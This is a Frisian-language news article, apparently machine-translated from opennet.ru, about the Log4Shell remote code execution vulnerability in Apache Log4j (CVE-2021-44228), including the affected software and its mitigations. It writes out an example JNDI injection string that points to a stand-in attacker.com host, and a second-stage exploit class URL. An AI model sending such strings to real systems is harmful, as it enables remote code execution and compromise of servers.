Yn Apache Log4j, in populêr ramt foar it organisearjen fan logboeken yn Java-applikaasjes, is in krityske kwetsberens identifisearre wêrtroch willekeurige koade kin wurde útfierd as in spesjaal opmakke wearde yn it "{jndi:URL}"-formaat nei it log skreaun wurdt. De oanfal kin wurde útfierd op Java-applikaasjes dy't wearden registrearje ûntfongen fan eksterne boarnen, bygelyks by it werjaan fan problematyske wearden yn flaterberjochten.
It wurdt opmurken dat hast alle projekten mei help fan kaders lykas Apache Struts, Apache Solr, Apache Druid of Apache Flink wurde beynfloede troch it probleem, ynklusyf Steam, Apple iCloud, Minecraft kliïnten en servers. It wurdt ferwachte dat de kwetsberens kin liede ta in weach fan massive oanfallen op bedriuwsapplikaasjes, werhelje de skiednis fan krityske kwetsberens yn it Apache Struts-ramt, dat, neffens in rûge skatting, wurdt brûkt yn webapplikaasjes troch 65% fan Fortune 100 bedriuwen. Ynklusyf besykjen om it netwurk te scannen op kwetsbere systemen.
It probleem wurdt fergrutte troch it feit dat al in wurkjende eksploitaasje is publisearre, mar fixes foar de stabile tûken binne noch net gearstald. De CVE-identifikaasje is noch net tawiisd. De fix is allinich opnommen yn 'e log4j-2.15.0-rc1 testtûke. As in oplossing foar it blokkearjen fan de kwetsberens is it oan te rieden om de parameter log4j2.formatMsgNoLookups op wier te setten.
It probleem waard feroarsake troch it feit dat log4j it ferwurkjen fan spesjale maskers "{}" stipet yn rigelsútfier nei it log, wêryn JNDI (Java Naming and Directory Interface) queries kinne wurde útfierd. De oanfal komt del op it trochjaan fan in tekenrige mei de ferfanging "${jndi:ldap://attacker.com/a}", by ferwurking hokker log4j in LDAP-fersyk stjoert foar it paad nei de Java-klasse nei de attacker.com-tsjinner . It paad weromjûn troch de tsjinner fan 'e oanfaller (bygelyks http://second-stage.attacker.com/Exploit.class) sil laden en útfierd wurde yn' e kontekst fan it aktuele proses, wêrtroch de oanfaller willekeurige koade kin útfiere op 'e systeem mei de rjochten fan 'e hjoeddeistige applikaasje.
Addendum 1: De kwetsberens is de identifier CVE-2021-44228 tawiisd.
Addendum 2: In manier om de beskerming te omgean troch release log4j-2.15.0-rc1 is identifisearre. In nije update, log4j-2.15.0-rc2, is foarsteld mei mear folsleine beskerming tsjin de kwetsberens. De koade markearret de feroaring dy't ferbûn is mei it ûntbrekken fan in abnormale beëiniging yn it gefal fan it brûken fan in ferkeard opmakke JNDI URL.
Boarne: opennet.ru